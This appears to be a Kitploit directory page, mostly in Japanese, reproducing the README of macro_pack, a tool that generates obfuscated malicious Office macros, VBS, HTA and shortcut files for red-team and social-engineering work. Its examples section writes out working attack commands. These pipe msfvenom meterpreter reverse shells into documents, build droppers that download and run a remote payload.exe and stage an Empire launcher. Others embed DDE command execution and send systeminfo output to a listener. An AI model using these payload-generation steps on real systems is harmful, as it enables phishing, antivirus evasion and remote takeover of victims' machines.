Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
macro_pack — macro_packは、@EmericNasi氏によるツールで、ペンテスト、デモ、ソーシャルエンジニアリング評価用のOffice文書、VBスクリプト、ショートカット、その他の形式の難読化と生成を自動化するために使用されます。macro_packの目標は、エクスプロイトとマルウェア対策バイパスを簡素化し、悪意のあるマクロおよびスクリプトの生成から最終的な文書生成までのプロセスを自動化することです。また、レッドチームやセキュリティ研究に役立つ多くの便利な機能も提供します。 | Kitploit
ツール/GitHubGitHub/sevagas/macro_pack
フィッシングツールエクスプロイトフレームワークペイロード生成横移動スクリプトと自動化ウェブアプリケーション悪用ペネトレーションテストソーシャルエンジニアリングレッドチーミングArchived
GitHubsevagas/macro_pack

macro_pack

2.3k414212年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

macro_packは、@EmericNasi氏によるツールで、ペンテスト、デモ、ソーシャルエンジニアリング評価用のOffice文書、VBスクリプト、ショートカット、その他の形式の難読化と生成を自動化するために使用されます。macro_packの目標は、エクスプロイトとマルウェア対策バイパスを簡素化し、悪意のあるマクロおよびスクリプトの生成から最終的な文書生成までのプロセスを自動化することです。また、レッドチームやセキュリティ研究に役立つ多くの便利な機能も提供します。

リポジトリを見るウェブサイト

Supported Python versions

macro_pack

概要


警告: MacroPack は 2021 年以降メンテナンスされていません。プロフェッショナルで、初期アクセス、侵害の想定、EDR バイパスのための攻撃的セキュリティツールが必要な場合は、https://www.balliskit.com を確認してください。


MacroPack Community は、MS Office ドキュメントや VBS のようなレトロな形式の難読化と生成を自動化するツールです。 また、さまざまなショートカット形式も処理します。 このツールは、レッドチーム演習、ペネトレーションテスト、デモ、ソーシャルエンジニアリング評価に使用できます。 MacroPack は、マルウェア対策ソリューションのバイパスを簡素化し、VB ソースから最終的な Office ドキュメントやその他のペイロードタイプまでのプロセスを自動化します。 使用は非常に簡単です:

  • 設定は不要
  • すべてを 1 行のコードで実行可能
  • 主要な Office 形式と VBS ベースの形式の生成
  • 高度なソーシャルエンジニアリング攻撃(メール、USB キーなど)用に設計されたペイロード

このツールは、人気のペンテストツール(Metasploit、Empire など)で生成されたペイロードと互換性があります。 また、標準入力からデータを読み取り、別のツールに静かな出力を提供できるため、他のツールと簡単に組み合わせることができます。このツールは Python3 で書かれており、Linux と Windows の両方のプラットフォームで動作します。

注: Office ドキュメントの自動生成やトロイの木馬機能には、適切な MS Office アプリケーションがインストールされた Windows プラットフォームが必要です。

Demo 1

難読化

このツールは、さまざまな難読化手法をすべて自動で使用します。 難読化機能は、MacroPack で生成可能なすべての VBA および VBS ベースの形式と互換性があります。 基本の難読化(-o オプション)には以下が含まれます:

  • 関数の名前変更
  • 変数の名前変更
  • スペースの削除
  • コメントの削除
  • 文字列のエンコード

生成

MacroPack は、いくつかの種類の MS Office ドキュメントおよびスクリプト形式を生成できます。 形式は、指定されたファイル拡張子に応じて自動的に推測されます。 ファイル生成は、--generate または -G オプションを使用して行います。 MacroPack プロバージョンでは、--trojan または -T オプションを使用して既存の Office ファイルにトロイの木馬を仕込むこともできます。

Ms Office サポート形式:

  • MS Word (.doc, .docm, .docx, .dotm)
  • MS Excel (.xls, .xlsm, .xslx, .xltm)
  • MS PowerPoint (.pptm, .potm)
  • MS Access (.accdb, .mdb)
  • MS Visio (.vsd,.vsdm)
  • MS Project (.mpp)

スクリプト(txt)サポート形式:

  • VBA text file (.vba)
  • VBS text file (.vbs).
  • Windows Script File (.wsf)
  • Windows Script Components scriptlets (.wsc, .sct)
  • HTML Applications (.hta)
  • XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^)

ショートカット/シェル サポート形式:

  • Shell Link (.lnk)
  • Explorer Command File (.scf)
  • URL Shortcut (.url)
  • Groove Shortcuts (.glk)
  • Settings Shortcuts (.settingcontent-ms)
  • MS Library (.library-ms)
  • Setup Information (.inf)
  • Excel Web Query (.iqy)
  • Visual Studio Project (.csproj)
  • Command line (.cmd)
  • SYmbolic LinK (.slk) Pro version only
  • Compressed HTML Help (.chm) Pro version only

スクリプトとショートカット形式(LNK を除く)は、MacroPack の Linux バージョンでも生成できることに注意してください。

倫理的使用

このソフトウェアは、レッドチーム演習、ペネトレーションテスト、フィッシングシミュレーション、セキュリティ研究、またはその他のセキュリティ評価の文脈において、システム所有者の合法的かつ正式な許可を得た場合にのみ使用する必要があります。 事前の同意なしにターゲットを攻撃するためにこのソフトウェアを使用することは禁止されており、違法です。 すべての適用される地方、州、連邦、国の法律を遵守するのはユーザーの責任です。 当社は、本ソフトウェアの使用により生じる可能性のある誤用や損害について一切の責任を負いません。

プロモードについて...

MacroPack のすべての機能とオプションが MacroPack Community で利用できるわけではありません。 オンラインで利用できるのはコミュニティバージョンのみです。 プロバージョンの機能は真にプロセスを「兵器化」するものであるため、そのアクセスはプロフェッショナルに制限されています。 プロモードには次のような機能が含まれます:

  • 高度なマルウェア対策バイパス
  • 高度なシェルコードインジェクション手法
  • コマンドライン難読化(Dosfuscation)
  • ASR および AMSI バイパス
  • 自己展開型 VBA/VBS ペイロード
  • 既存の MS Office ドキュメント、ヘルプファイル、Visual Studio プロジェクトへのトロイの木馬仕込み
  • デコイペイロードの埋め込み
  • DCOM オブジェクトを使用した横方向の移動
  • リバースエンジニアリング対策
  • サンドボックス検出
  • Excel 4.0 SYLK やコンパイル済みヘルプファイルなどの追加形式のサポート
  • 特殊な形式からの高度な VB ペイロードの実行
  • 兵器化されたテンプレートおよび追加テンプレート(例: EMPIRE, AUTOSHELLCODE)
  • Excel 4.0 マクロ(XLM)
  • その他多数...

いくつかの短いデモ動画は BallisKit Vimeo チャンネル でご覧いただけます。

重要: MacroPack プロについて連絡したい場合は、私のメールアドレス emeric.nasi [at] sevagas.com を使用してください。 プロバージョンに関する匿名の問い合わせには回答しません。プロフェッショナルなメールのみ対応します。

実行/インストール

Windows バイナリの実行

  1. 最新のバイナリを https://github.com/sevagas/macro_pack/releases/ から入手してください。
  2. 正規の Microsoft Office がインストールされた PC にバイナリをダウンロードします。
  3. コンソールを開き、バイナリディレクトリに CD してバイナリを呼び出します。これだけで完了です!```bash macro_pack.exe --help
### ソースからインストール

MacroPackをビルドするには、Windowsマシンを使用する必要があります。依存関係をダウンロードしてインストールしてください:```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

このツールはPython 3で動作していますので、python3のインストールを確認してください。例:```bash python3 macro_pack.py --help

or

python macro_pack.py --help # if python3 is default install

pyinstallerを使用してスタンドアロンexeを生成する場合:  
* pyinstallerをインストール: pip install pyinstaller
* "build.bat"スクリプトをダブルクリックします。

生成されたmacro\_pack.exeは**bin**ディレクトリ内に配置されます。  


## いくつかの例

### MacroPack Community

- サポートされているすべてのファイル形式を一覧表示する```bash
macro_pack.exe --listformats
  • 利用可能なテンプレートをすべてリスト表示する```bash macro_pack.exe --listtemplates
- msfvenom によって生成された vba ファイルを難読化し、結果を新しい VBA ファイルに配置します。```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba
  • EmpireステージャーVBAファイルを難読化し、MS Word文書を生成する:```bash macro_pack.exe -f empire.vba -o -G myDoc.docm
- 難読化されたドロッパー(payload.exeをダウンロードしてdropped.exeとして保存する)を含むMS Excelファイルを生成する```bash
echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -G "drop.xlsm" 
  • 共有フォルダ内に難読化されたVBA reverse meterpreter payloadを含むWord 97文書を作成します。```bash msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G \REMOTE-PC\Share\meter.doc
- powershell.exeを使用せずに、DROPPER_PSテンプレートを使ってEmpire Launcher stagerをダウンロードして実行する```bash
# 1 Generate a file containing Empire lauchcher 
# 2 Make that file available on web server, ex with netcat:
{ echo -ne "HTTP/1.0 200 OK\r\n\r\n"; cat empire_stager.cmd; } | nc -l -p 6666 -q1
# 3 Use macro\_pack  to generate DROPPER_PS payload in Excel file
echo http://10.5.5.12:6543/empire_stager.cmd | macro_pack.exe -o -t DROPPER_PS -G join_the_empire.xls
# 4 When executed on target, the macro will download PowerShdll, run it with rundll32, and download and execute stager.
  • Dynamic Data Exchange (DDE) 攻撃を介して calc.exe を実行する```bash echo calc.exe | macro_pack.exe --dde -G calc.xslx
<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/23fa8cfadc283a7abf02bde5fd10748c8c1d90bc3d977ee47024fe4e9d963824.png" alt="Excel DDE demo"></p>

- Dynamic Data Exchange (DDE)攻撃を使用して、PowerShellを介してファイルをダウンロードして実行する```bash
# 1 Change the target file URL in resources\community\ps_dl_exec.cmd
# 2 Embed download execute cmd in document
macro_pack.exe --dde -f ..\resources\community\ps_dl_exec.cmd -G DDE.xslx
  • Excel WebクエリファイルとDDEを介してコマンド(notepad.exe)を実行する```bash

1 Create dde.dat file with next content

=cmd|' /c notepad.exe'!A1

2 Host dde.dat on webserver, ex. using macro_pack -l

3 Generate .iqy file

macro_pack.exe -G dde.iqy

<p align="center"><img src="https://assets.kitploit.com/production/public/readmes/1646/26c6e5a38eb09ae914c743b473890cef40632ccbd25bce0a895f9f4770377f7d.png" alt="IQYデモ"></p>


 - 難読化されたmeterpreter reverse TCP VBSファイルを生成して実行する ```batch
# 1 Generate obfuscated VBS based on meterpreter template as well as Metasploit resource file
echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.vbs
# 2 On attacker machine Setup meterpreter listener
msfconsole -r meterpreter.rc
# 3 run VBS file with wscript (run 32bit wscript because meterpreter payload is 32bit)
%windir%\SysWoW64\wscript meter.vbs

  • 難読化されたHTAファイルを生成し、"systeminfo"を実行して、結果を192.168.0.5で待ち受ける別のmacro_packに返送する。```batch

1 Generate HTA file with REMOTE_CMD template

echo http://192.168.0.5:1234/a "systeminfo" | macro_pack.exe -t REMOTE_CMD -o -G info.hta

2 On 192.168.0.5 open macro_pack as http listener

macro_pack.exe -l . --port=1234

3 run hta file with mshta

mshta.exe full/path/to/info.hta

- クリックするとローカルのHTAファイルを実行するURLショートカットを生成します```batch
 echo "file://C:\Users\username\Desktop\hello.hta" | macro_pack.exe -G yop.url
  • calc.exe を実行する cmd を実行し、calc.exe アイコンを持つ lnk ショートカットを生成```batch echo '"c:\Windows\System32\cmd.exe /c calc.exe" "calc.exe"' | macro_pack.exe -G calc.lnk
### MacroPack Pro のいくつかの例
ツールをダウンロード